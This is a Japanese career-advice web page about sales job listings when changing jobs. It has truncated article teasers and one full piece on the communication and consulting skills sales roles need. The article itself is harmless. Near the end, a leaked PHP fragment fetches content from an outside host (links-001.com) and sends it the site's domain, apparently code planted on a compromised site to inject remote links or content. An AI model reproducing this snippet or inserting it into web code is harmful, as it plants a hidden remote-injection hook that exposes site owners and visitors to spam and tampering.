前へ
次へ

転職の際に営業求人を選択する

今は一生涯、1つの企業で仕事をするという人が減少をしてきています。
転職を経験することによって、自分に

more

営業求人を扱っている転職サイト

転職サイトもたくさんの種類があるので、実際に転職を考えている場合にはどういうサイトを利用するべきなの

more

営業求人を出している会社に転職して正解だった

私は転職に対してネガティブに考えたことはなくたった一度の人生なのでやりたいことをやれば良いと思ってい

more

転職に必要となる営業求人のスキル

転職を視野に、営業求人を閲覧している人もいるでしょう。
営業求人情報では、必要なスキルに注目することや、転職してからの営業で身につくスキルに注目してみることも大切です。
というのも、営業のスタイルは多種多様だからです。
それでも、すべての営業職には共通して必要となる要素があることをご存知でしょうか。
その1つは『コミュニケーション力』で、2つ目は『コンサルティング力』だといいます。
コミュニケーション力と聞くと、話題が豊富になければならない、そうしたイメージもあるでしょう。
もちろん、営業求人ではそれを武器にしてもらいたい人材を募集しています。
話題があれば商品を紹介する前に相手との距離を縮めることができます。
ですが、営業活動では一方的に話すのではなく、人の話を聞けることのほうが重要だといいます。
お客さまが個人であれ、企業であれ、相手をよく観察し、相手のペースに合わせることがポイントで、快く話せる空気をつくれるコミュニケーションが必要だといいます。
相手は良いことばかりを伝えてくるばかりでなく、クレームや提案などもしてくるからで、そうしたデメリットを口にしやすい空気をつくれる人材は重宝されています。
それこそが、業績にも繋がるからで、お客さまの意見を受け止め、改善させ、提供することで信頼を得られるからです。
これは、固定客でも新規開拓であっても変わらず、必要となります。
ですから、コミュニケーションに特化していた業界・職種からの転職者には有利かもしれません。
製造や流通、小売りはもちろん、サービス・レジャー・アミューズメントからでも活躍できるでしょう。
そして『コンサルティング力』は、相手に話をさせることによって、課題やニーズを引き出し、相手の立場に立って考える力を指していますから、こうした力は大いにアピールすべきです。
解決するために、自社の商品をどう扱うか、考え直せるキッカケにもなりますし、提案する力になるでしょう。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top